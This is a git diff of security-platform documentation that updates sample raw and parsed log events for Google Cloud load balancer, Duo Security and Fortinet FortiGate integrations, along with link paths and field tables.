"backendTargetProjectNumber": "projects/123456789", + "@type": 
"type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry", + "statusDetails": "denied_by_security_policy", + "cacheDecision": [ + "RESPONSE_HAS_CONTENT_TYPE", + "REQUEST_HAS_IF_NONE_MATCH", + "CACHE_MODE_USE_ORIGIN_HEADERS" + ], + "enforcedSecurityPolicy": { + "priority": 1000, + "outcome": "DENY", + "configuredAction": "DENY", + "name": "block-all-http-requests" + } + }, + "httpRequest": { + "requestMethod": "GET", + "requestUrl": "http://malicious.site/url", + "requestSize": "488", + "status": 403, + "responseSize": "258", + "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", + "remoteIp": "1.2.3.4", + "latency": "0.102957s" + }, + "resource": { + "type": "http_load_balancer", + "labels": { + "target_proxy_name": "http-lb-proxy", + "project_id": "project_id", + "zone": "global", + "url_map_name": "http-load-balancer", + "forwarding_rule_name": "http-content-rule", + "backend_service_name": "backend-service" + } + }, + "timestamp": "2023-12-25T07:17:32.061039Z", + "severity": "WARNING", + "logName": "projects/project_id/logs/requests", + "trace": "projects/project_id/traces/15dc480f7c7879c404b6b33843099866", + "receiveTimestamp": "2023-12-25T07:17:33.457621996Z", + "spanId": "25c549956d7c28e2" + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/515ed00f-bf70-4fce-96cc-0ca31abd5d24.md b/_shared_content/operations_center/integrations/generated/515ed00f-bf70-4fce-96cc-0ca31abd5d24.md index 1f33440050..3610d52910 100644 --- a/_shared_content/operations_center/integrations/generated/515ed00f-bf70-4fce-96cc-0ca31abd5d24.md +++ b/_shared_content/operations_center/integrations/generated/515ed00f-bf70-4fce-96cc-0ca31abd5d24.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "flow_logs_gke.json" diff --git a/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e.md b/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e.md index 291007dee5..e158d4f22e 100644 --- a/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e.md +++ b/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e.md 
@@ -25,20 +25,73 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. 
+ +=== "test_admin_log.json" + + ```json + + { + "message": "{\"action\": \"admin_login\", \"description\": \"{\\\"ip_address\\\": \\\"1.2.3.4\\\", \\\"role\\\": \\\"Owner\\\", \\\"device\\\": \\\"+555 123456\\\", \\\"factor\\\": \\\"push\\\", \\\"primary_auth_method\\\": \\\"Password\\\"}\", \"isotimestamp\": \"2024-08-06T09:52:42+00:00\", \"object\": null, \"timestamp\": 1722937962, \"username\": \"John Doe\", \"eventtype\": \"admin_log\", \"host\": \"example.duosecurity.com\"}", + "event": { + "action": "admin_login", + "category": [ + "iam" + ], + "dataset": "admin_log", + "type": [ + "admin" + ] + }, + "@timestamp": "2024-08-06T09:52:42Z", + "duo": { + "security": { + "telephony": { + "phone_number": "+555 123456" + } + } + }, + "observer": { + "hostname": "example.duosecurity.com", + "product": "Duo Security", + "vendor": "Duo" + }, + "related": { + "hosts": [ + "example.duosecurity.com" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "John Doe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "John Doe" + } + } + + ``` + === "test_admin_log_error.json" ```json { - "message": "{\n \"eventtype\": \"admin_log\",\n \"action\": \"admin_login_error\",\n \"description\": \"{\\\"ip_address\\\": \\\"10.1.23.116\\\", \\\"error\\\": \\\"SAML login is disabled\\\", \\\"email\\\": \\\"narroway@example.com\\\"}\",\n \"isotimestamp\": \"2020-01-23T16:18:58+00:00\",\n \"object\": null,\n \"timestamp\": 1579796338,\n \"username\": \"\"\n}", + "message": "{\"eventtype\": \"admin_log\", \"action\": \"admin_login_error\", \"description\": \"{\\\"ip_address\\\": \\\"10.1.23.116\\\", \\\"error\\\": \\\"SAML login is disabled\\\", \\\"email\\\": \\\"narroway@example.com\\\"}\", \"isotimestamp\": \"2020-01-23T16:18:58+00:00\", \"object\": null, \"timestamp\": 1579796338, \"username\": \"\"}", "event": { "action": "admin_login_error", "category": [ "iam" ], "dataset": "admin_log", + "reason": "SAML login is disabled", "type": [ "admin" ] 
@@ -47,6 +100,18 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "observer": { "product": "Duo Security", "vendor": "Duo" + }, + "related": { + "ip": [ + "10.1.23.116" + ] + }, + "source": { + "address": "10.1.23.116", + "ip": "10.1.23.116" + }, + "user": { + "email": "narroway@example.com" } } @@ -58,7 +123,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"admin_log\",\n \"action\": \"user_update\",\n \"description\": \"{\\\"notes\\\": \\\"Joe asked for their nickname to be displayed instead of Joseph.\\\", \\\"realname\\\": \\\"Joe Smith\\\"}\",\n \"isotimestamp\": \"2020-01-24T15:09:42+00:00\",\n \"object\": \"jsmith\",\n \"timestamp\": 1579878582,\n \"username\": \"admin\"\n}", + "message": "{\"eventtype\": \"admin_log\", \"action\": \"user_update\", \"description\": \"{\\\"notes\\\": \\\"Joe asked for their nickname to be displayed instead of Joseph.\\\", \\\"realname\\\": \\\"Joe Smith\\\"}\", \"isotimestamp\": \"2020-01-24T15:09:42+00:00\", \"object\": \"jsmith\", \"timestamp\": 1579878582, \"username\": \"admin\"}", "event": { "action": "user_update", "category": [ 
@@ -97,7 +162,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"auth_log\",\n \"access_device\": {\n \"browser\": \"Chrome\",\n \"browser_version\": \"67.0.3396.99\",\n \"flash_version\": \"uninstalled\",\n \"hostname\": null,\n \"ip\": \"169.232.89.219\",\n \"is_encryption_enabled\": true,\n \"is_firewall_enabled\": true,\n \"is_password_set\": true,\n \"java_version\": \"uninstalled\",\n \"location\": {\n \"city\": \"Ann Arbor\",\n \"country\": \"United States\",\n \"state\": \"Michigan\"\n },\n \"os\": \"Mac OS X\",\n \"os_version\": \"10.14.1\",\n \"security_agents\": []\n },\n \"adaptive_trust_assessments\": {\n \"more_secure_auth\": {\n \"features_version\": \"3.0\",\n \"model_version\": \"2022.07.19.001\",\n \"policy_enabled\": false,\n \"reason\": \"Normal level of trust; no detection of known attack pattern\",\n \"trust_level\": \"NORMAL\"\n },\n \"remember_me\": {\n \"features_version\": \"3.0\",\n \"model_version\": \"2022.07.19.001\",\n \"policy_enabled\": false,\n \"reason\": \"Known Access IP\",\n \"trust_level\": \"NORMAL\"\n }\n },\n \"alias\": \"\",\n \"application\": {\n \"key\": \"DIY231J8BR23QK4UKBY8\",\n \"name\": \"Microsoft Azure Active Directory\"\n },\n \"auth_device\": {\n \"ip\": \"192.168.225.254\",\n \"key\": \"DP5BJ05HI4WRBVI4Q7JF\",\n \"location\": {\n \"city\": \"Ann Arbor\",\n \"country\": \"United States\",\n \"state\": \"Michigan\"\n },\n \"name\": \"My iPhone X (734-555-2342)\"\n },\n \"email\": \"narroway@example.com\",\n \"event_type\": \"authentication\",\n \"factor\": \"duo_push\",\n \"isotimestamp\": \"2020-02-13T18:56:20.351346+00:00\",\n \"ood_software\": null,\n \"reason\": \"user_approved\",\n \"result\": \"success\",\n \"timestamp\": 1581620180,\n \"trusted_endpoint_status\": \"not trusted\",\n \"txid\": \"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\n \"user\": {\n \"groups\": [\"Duo Users\", \"CorpHQ Users\"],\n \"key\": 
\"DU3KC77WJ06Y5HIV7XKQ\",\n \"name\": \"narroway@example.com\"\n }\n}", + "message": "{\"eventtype\": \"auth_log\", \"access_device\": {\"browser\": \"Chrome\", \"browser_version\": \"67.0.3396.99\", \"flash_version\": \"uninstalled\", \"hostname\": null, \"ip\": \"169.232.89.219\", \"is_encryption_enabled\": true, \"is_firewall_enabled\": true, \"is_password_set\": true, \"java_version\": \"uninstalled\", \"location\": {\"city\": \"Ann Arbor\", \"country\": \"United States\", \"state\": \"Michigan\"}, \"os\": \"Mac OS X\", \"os_version\": \"10.14.1\", \"security_agents\": []}, \"adaptive_trust_assessments\": {\"more_secure_auth\": {\"features_version\": \"3.0\", \"model_version\": \"2022.07.19.001\", \"policy_enabled\": false, \"reason\": \"Normal level of trust; no detection of known attack pattern\", \"trust_level\": \"NORMAL\"}, \"remember_me\": {\"features_version\": \"3.0\", \"model_version\": \"2022.07.19.001\", \"policy_enabled\": false, \"reason\": \"Known Access IP\", \"trust_level\": \"NORMAL\"}}, \"alias\": \"\", \"application\": {\"key\": \"DIY231J8BR23QK4UKBY8\", \"name\": \"Microsoft Azure Active Directory\"}, \"auth_device\": {\"ip\": \"192.168.225.254\", \"key\": \"DP5BJ05HI4WRBVI4Q7JF\", \"location\": {\"city\": \"Ann Arbor\", \"country\": \"United States\", \"state\": \"Michigan\"}, \"name\": \"My iPhone X (734-555-2342)\"}, \"email\": \"narroway@example.com\", \"event_type\": \"authentication\", \"factor\": \"duo_push\", \"isotimestamp\": \"2020-02-13T18:56:20.351346+00:00\", \"ood_software\": null, \"reason\": \"user_approved\", \"result\": \"success\", \"timestamp\": 1581620180, \"trusted_endpoint_status\": \"not trusted\", \"txid\": \"340a23e3-23f3-23c1-87dc-1491a23dfdbb\", \"user\": {\"groups\": [\"Duo Users\", \"CorpHQ Users\"], \"key\": \"DU3KC77WJ06Y5HIV7XKQ\", \"name\": \"narroway@example.com\"}}", "event": { "category": [ "authentication" 
@@ -121,6 +186,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "169.232.89.219" + ], + "user": [ + "narroway@example.com" ] }, "source": { @@ -135,6 +203,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "email": "narroway@example.com", "id": "DU3KC77WJ06Y5HIV7XKQ", + "name": "narroway@example.com", "roles": [ "CorpHQ Users", "Duo Users" 
@@ -149,12 +218,76 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_auth_log_2.json" + + ```json + + { + "message": "{\"access_device\": {\"browser\": \"Electron\", \"browser_version\": \"11.5.0\", \"epkey\": \"EPKEYEXAMPLE\", \"flash_version\": \"uninstalled\", \"hostname\": null, \"ip\": \"1.2.3.4\", \"is_encryption_enabled\": \"unknown\", \"is_firewall_enabled\": \"unknown\", \"is_password_set\": \"unknown\", \"java_version\": \"uninstalled\", \"location\": {\"city\": \"Paris\", \"country\": \"France\", \"state\": \"\\u00cele-de-France\"}, \"os\": \"Windows\", \"os_version\": \"10\"}, \"adaptive_trust_assessments\": {\"more_secure_auth\": {\"detected_attack_detectors\": null, \"features_version\": \"3.0\", \"model_version\": \"2022.07.19.001\", \"policy_enabled\": false, \"preview_mode_enabled\": true, \"reason\": \"Normal level of trust; no detection of known attack pattern\", \"trust_level\": \"NORMAL\"}, \"remember_me\": {\"features_version\": \"3.0\", \"model_version\": \"2022.07.19.001\", \"policy_enabled\": false, \"reason\": \"Known Access IP\", \"trust_level\": \"NORMAL\"}}, \"alias\": \"\", \"application\": {\"key\": \"APPLICATIONKEY\", \"name\": \"Fortigate VPN SSL - Single Sign-On\"}, \"auth_device\": {\"ip\": null, \"key\": null, \"location\": {\"city\": null, \"country\": null, \"state\": null}, \"name\": null}, \"email\": \"john.doe@example.com\", \"event_type\": \"authentication\", \"factor\": \"remembered_device\", \"isotimestamp\": \"2024-08-06T13:06:35.435426+00:00\", \"ood_software\": null, \"rbfs_triggered_attacks\": null, \"reason\": \"remembered_device\", \"remembered_factor\": \"duo_push\", \"result\": \"success\", \"timestamp\": 1722949595, \"trusted_endpoint_status\": \"unknown\", \"txid\": \"9f79ad67-e7f5-4f33-850c-75175d79253a\", \"user\": {\"groups\": [\"GG_VPN_DUO (from AD sync \\\"AD Sync\\\")\"], \"key\": \"EXAMPLEKEY\", \"name\": \"vsainterosemeril\"}, \"eventtype\": \"auth_log\", 
\"host\": \"example.duosecurity.com\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "auth_log", + "type": [ + "info" + ] + }, + "@timestamp": "2024-08-06T13:06:35.435426Z", + "host": { + "os": { + "name": "Windows", + "version": "10" + } + }, + "observer": { + "hostname": "example.duosecurity.com", + "product": "Duo Security", + "vendor": "Duo" + }, + "related": { + "hosts": [ + "example.duosecurity.com" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "vsainterosemeril" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "city_name": "Paris", + "country_name": "France", + "region_name": "\u00cele-de-France" + }, + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@example.com", + "id": "EXAMPLEKEY", + "name": "vsainterosemeril", + "roles": [ + "GG_VPN_DUO (from AD sync \"AD Sync\")" + ] + }, + "user_agent": { + "name": "Electron", + "version": "11.5.0" + } + } + + ``` + + === "test_offline_log.json" ```json { - "message": "{\n \"eventtype\": \"offline_log\",\n \"action\": \"o2fa_user_provisioned\",\n \"description\": \"{\\\"user_agent\\\": \\\"DuoCredProv/4.0.6.413 (Windows NT 6.3.9600; x64; Server)\\\", \\\"hostname\\\": \\\"WKSW10x64\\\", \\\"factor\\\": \\\"duo_otp\\\"}\",\n \"isotimestamp\": \"2019-08-30T16:10:05+00:00\",\n \"object\": \"Acme Laptop Windows Logon\",\n \"timestamp\": 1567181405,\n \"username\": \"narroway\"\n}", + "message": "{\"eventtype\": \"offline_log\", \"action\": \"o2fa_user_provisioned\", \"description\": \"{\\\"user_agent\\\": \\\"DuoCredProv/4.0.6.413 (Windows NT 6.3.9600; x64; Server)\\\", \\\"hostname\\\": \\\"WKSW10x64\\\", \\\"factor\\\": \\\"duo_otp\\\"}\", \"isotimestamp\": \"2019-08-30T16:10:05+00:00\", \"object\": \"Acme Laptop Windows Logon\", \"timestamp\": 1567181405, \"username\": \"narroway\"}", "event": { "action": "o2fa_user_provisioned", "category": [ 
@@ -207,7 +340,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"telephony_log\",\n \"context\": \"administrator login\",\n \"credits\": 0,\n \"phone\": \"+13135559542\",\n \"telephony_id\": \"5bf1a860-fe39-49e3-be29-217659663a74\",\n \"ts\": \"2022-10-25T16:07:45.304526+00:00\",\n \"txid\": \"fb0c129b-f994-4d3d-953b-c3e764272eb7\",\n \"type\": \"sms\"\n}", + "message": "{\"eventtype\": \"telephony_log\", \"context\": \"administrator login\", \"credits\": 0, \"phone\": \"+13135559542\", \"telephony_id\": \"5bf1a860-fe39-49e3-be29-217659663a74\", \"ts\": \"2022-10-25T16:07:45.304526+00:00\", \"txid\": \"fb0c129b-f994-4d3d-953b-c3e764272eb7\", \"type\": \"sms\"}", "event": { "category": [ "authentication" @@ -240,7 +373,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"telephony_log\",\n \"context\": \"authentication\",\n \"credits\": 2,\n \"phone\": \"+17345551311\",\n \"telephony_id\": \"60799fee-f08f-4ba8-971f-4e53b3473e9a\",\n \"ts\": \"2023-01-26T20:54:12.573580+00:00\",\n \"txid\": \"373bd5f3-1e42-4a5d-aefa-b33ae278fac8\",\n \"type\": \"phone\"\n}", + "message": "{\"eventtype\": \"telephony_log\", \"context\": \"authentication\", \"credits\": 2, \"phone\": \"+17345551311\", \"telephony_id\": \"60799fee-f08f-4ba8-971f-4e53b3473e9a\", \"ts\": \"2023-01-26T20:54:12.573580+00:00\", \"txid\": \"373bd5f3-1e42-4a5d-aefa-b33ae278fac8\", \"type\": \"phone\"}", "event": { "category": [ "authentication" 
@@ -273,7 +406,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"telephony_log\",\n \"context\": \"enrollment\",\n \"credits\": 1,\n \"phone\": \"+12125556707\",\n \"telephony_id\": \"220f89ff-bff8-4466-b6cb-b7787940ce68\",\n \"ts\": \"2023-03-21T22:34:49.466370+00:00\",\n \"txid\": \"2f5d34d3-053f-422c-9dd4-77a5d58706b1\",\n \"type\": \"sms\"\n}", + "message": "{\"eventtype\": \"telephony_log\", \"context\": \"enrollment\", \"credits\": 1, \"phone\": \"+12125556707\", \"telephony_id\": \"220f89ff-bff8-4466-b6cb-b7787940ce68\", \"ts\": \"2023-03-21T22:34:49.466370+00:00\", \"txid\": \"2f5d34d3-053f-422c-9dd4-77a5d58706b1\", \"type\": \"sms\"}", "event": { "category": [ "authentication" @@ -322,6 +455,7 @@ The following table lists the fields that are extracted, normalized under the EC |`host.name` | `keyword` | Name of the host. | |`host.os.name` | `keyword` | Operating system name, without the version. | |`host.os.version` | `keyword` | Operating system version as a raw string. | +|`observer.hostname` | `keyword` | Hostname of the observer. | |`observer.product` | `keyword` | The product name of the observer. | |`observer.vendor` | `keyword` | Vendor name of the observer. | |`source.geo.city_name` | `keyword` | City name. | diff --git a/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e_sample.md b/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e_sample.md index 33d2fa40a9..10e38a1b44 100644 --- a/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e_sample.md +++ b/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e_sample.md 
@@ -4,6 +4,24 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "test_admin_log" + + + ```json + { + "action": "admin_login", + "description": "{\"ip_address\": \"1.2.3.4\", \"role\": \"Owner\", \"device\": \"+555 123456\", \"factor\": \"push\", \"primary_auth_method\": \"Password\"}", + "isotimestamp": "2024-08-06T09:52:42+00:00", + "object": null, + "timestamp": 1722937962, + "username": "John Doe", + "eventtype": "admin_log", + "host": "example.duosecurity.com" + } + ``` + + + === "test_admin_log_error" 
@@ -117,6 +135,89 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_auth_log_2" + + + ```json + { + "access_device": { + "browser": "Electron", + "browser_version": "11.5.0", + "epkey": "EPKEYEXAMPLE", + "flash_version": "uninstalled", + "hostname": null, + "ip": "1.2.3.4", + "is_encryption_enabled": "unknown", + "is_firewall_enabled": "unknown", + "is_password_set": "unknown", + "java_version": "uninstalled", + "location": { + "city": "Paris", + "country": "France", + "state": "\u00cele-de-France" + }, + "os": "Windows", + "os_version": "10" + }, + "adaptive_trust_assessments": { + "more_secure_auth": { + "detected_attack_detectors": null, + "features_version": "3.0", + "model_version": "2022.07.19.001", + "policy_enabled": false, + "preview_mode_enabled": true, + "reason": "Normal level of trust; no detection of known attack pattern", + "trust_level": "NORMAL" + }, + "remember_me": { + "features_version": "3.0", + "model_version": "2022.07.19.001", + "policy_enabled": false, + "reason": "Known Access IP", + "trust_level": "NORMAL" + } + }, + "alias": "", + "application": { + "key": "APPLICATIONKEY", + "name": "Fortigate VPN SSL - Single Sign-On" + }, + "auth_device": { + "ip": null, + "key": null, + "location": { + "city": null, + "country": null, + "state": null + }, + "name": null + }, + "email": "john.doe@example.com", + "event_type": "authentication", + "factor": "remembered_device", + "isotimestamp": "2024-08-06T13:06:35.435426+00:00", + "ood_software": null, + "rbfs_triggered_attacks": null, + "reason": "remembered_device", + "remembered_factor": "duo_push", + "result": "success", + "timestamp": 1722949595, + "trusted_endpoint_status": "unknown", + "txid": "9f79ad67-e7f5-4f33-850c-75175d79253a", + "user": { + "groups": [ + "GG_VPN_DUO (from AD sync \"AD Sync\")" + ], + "key": "EXAMPLEKEY", + "name": "vsainterosemeril" + }, + "eventtype": "auth_log", + "host": "example.duosecurity.com" + } + ``` + + + === 
"test_offline_log" diff --git a/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981.md b/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981.md index e96591d00a..a2dbf0c83b 100644 --- a/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981.md +++ b/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981.md @@ -21,7 +21,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "Configuration_changed.CEF.json" @@ -397,6 +397,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "agt" } + }, + "user": { + "name": "agt" } } 
@@ -631,6 +634,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "test" } + }, + "user": { + "name": "test" } } @@ -829,6 +835,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "sip:sipp@127.0.0.1:5060" } + }, + "user": { + "name": "sip:sipp@127.0.0.1:5060" } } @@ -1549,6 +1558,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "url": { "original": "/success.txt", "path": "/success.txt" + }, + "user": { + "name": "alice" } } 
@@ -1644,6 +1656,73 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "bob" } + }, + "user": { + "name": "bob" + } + } + + ``` + + +=== "editpolicy.json" + + ```json + + { + "message": "time=11:36:13 devname=\"PC-01-OS1\" devid=\"XXXXXXXXXXXX\" eventtime=1721727373453168766 tz=\"+0200\" logid=\"010000000\" type=\"event\" subtype=\"system\" level=\"information\" vd=\"AAAA-AA\" logdesc=\"Object attribute configured\" user=\"username\" ui=\"GUI(1.0.0.0)\" action=\"Edit\" cfgtid=111111111 uuid=\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\" cfgpath=\"firewall.policy\" cfgobj=\"756\" cfgattr=\"service[svc-win->svc-repo-linux-port]\" msg=\"Edit firewall.policy 756\"", + "event": { + "action": "Edit", + "category": "event", + "code": "010000000", + "dataset": "event:system", + "outcome": "success", + "reason": "Edit firewall.policy 756", + "timezone": "+0200" + }, + "@timestamp": "2024-07-23T09:36:13.453169Z", + "action": { + "name": "Edit", + "outcome": "success", + "outcome_reason": "Edit firewall.policy 756", + "type": "system" + }, + "fortinet": { + "fortigate": { + "event": { + "type": "event" + }, + "poluuid": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx", + "virtual_domain": "AAAA-AA" + } + }, + "host": { + "name": "PC-01-OS1" + }, + "log": { + "description": "Object attribute configured", + "hostname": "PC-01-OS1", + "level": "information" + }, + "observer": { + "hostname": "PC-01-OS1", + "serial_number": "XXXXXXXXXXXX" + }, + "related": { + "hosts": [ + "PC-01-OS1" + ], + "user": [ + "username" + ] + }, + "source": { + "user": { + "name": "username" + } + }, + "user": { + "name": "username" } } @@ -1721,6 +1800,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "testpc1@qa.fortinet.com" } + }, + "user": { + "name": "testpc1@qa.fortinet.com" } } 
@@ -1842,6 +1924,113 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "forwadedfor.json" + + ```json + + { + "message": "time=10:59:48 devname=\"FW-001\" devid=\"xxxxxxxxxx\" eventtime=1720429188081127405 tz=\"+0200\" logid=\"0000000\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_allow\" level=\"notice\" vd=\"root\" policyid=00000 poluuid=\"xxxxxx-xxxx-xxxx-xxxxxx\" policytype=\"policy\" sessionid=111111111 srcip=11.0.0.0 srcport=1000 srccountry=\"France\" srcintf=\"aaaaaaaaa\" srcintfrole=\"wan\" srcuuid=\"xxxxxx-xxxx-xxxx-xxxxxxxxxxx\" dstip=10.0.0.1 dstport=80 dstcountry=\"Reserved\" dstintf=\"aaaaaaaa\" dstintfrole=\"lan\" dstuuid=\"xxxxxxx-xxxx-xxxx-xxxxxxxxxxxx\" proto=6 service=\"HTTP\" hostname=\"sekoia.io\" forwardedfor=\"1.2.3.4\" profile=\"monitor-all\" action=\"passthrough\" reqtype=\"direct\" url=\"http://sekoia.io/\" sentbyte=270 rcvdbyte=0 direction=\"outgoing\" msg=\"URL belongs to an allowed category in policy\" method=\"domain\" cat=51 catdesc=\"Government and Legal Organizations\"", + "event": { + "action": "passthrough", + "category": "utm", + "code": "0000000", + "outcome": "success", + "provider": "domain", + "reason": "URL belongs to an allowed category in policy", + "timezone": "+0200" + }, + "@timestamp": "2024-07-08T08:59:48.081128Z", + "action": { + "name": "passthrough", + "outcome": "success", + "outcome_reason": "URL belongs to an allowed category in policy", + "target": "network-traffic", + "type": "webfilter" + }, + "destination": { + "address": "10.0.0.1", + "bytes": 0, + "domain": "sekoia.io", + "ip": "10.0.0.1", + "port": 80 + }, + "fortinet": { + "fortigate": { + "event": { + "type": "utm" + }, + "policyid": "00000", + "poluuid": "xxxxxx-xxxx-xxxx-xxxxxx", + "virtual_domain": "root" + } + }, + "host": { + "name": "FW-001" + }, + "http": { + "request": { + "method": "domain" + } + }, + "log": { + "hostname": "FW-001", + "level": "notice" + }, + "network": { + "bytes": 270, + 
"forwarded_ip": "1.2.3.4", + "protocol": "http", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "aaaaaaaa" + } + }, + "hostname": "FW-001", + "ingress": { + "interface": { + "name": "aaaaaaaaa" + } + }, + "serial_number": "xxxxxxxxxx" + }, + "related": { + "hosts": [ + "FW-001", + "sekoia.io" + ], + "ip": [ + "10.0.0.1", + "11.0.0.0" + ] + }, + "rule": { + "category": "Government and Legal Organizations", + "ruleset": "policy" + }, + "source": { + "address": "11.0.0.0", + "bytes": 270, + "ip": "11.0.0.0", + "port": 1000 + }, + "url": { + "domain": "sekoia.io", + "full": "http://sekoia.io/", + "original": "http://sekoia.io/", + "path": "/", + "port": 80, + "registered_domain": "sekoia.io", + "scheme": "http", + "top_level_domain": "io" + } + } + + ``` + + === "hostname.STANDARD.json" ```json @@ -2556,7 +2745,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "2.2.2.2", - "bytes": 202, + "bytes": 52, "ip": "2.2.2.2", "port": 1522 }, @@ -2589,7 +2778,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "1.1.1.1", - "bytes": 52, + "bytes": 202, "ip": "1.1.1.1", "port": 55390 } @@ -2620,7 +2809,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "3.3.3.3", - "bytes": 48, + "bytes": 144, "ip": "3.3.3.3", "nat": { "ip": "2.2.2.2", @@ -2662,7 +2851,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "1.1.1.1", - "bytes": 144, + "bytes": 48, "ip": "1.1.1.1", "packets": 1, "port": 49260 @@ -2694,7 +2883,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "52.53.140.235", - "bytes": 3652, + "bytes": 146668, "ip": "52.53.140.235", "port": 443 }, 
@@ -2731,7 +2920,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "10.1.100.11", - "bytes": 146668, + "bytes": 3652, "ip": "10.1.100.11", "nat": { "ip": "172.16.200.1", 
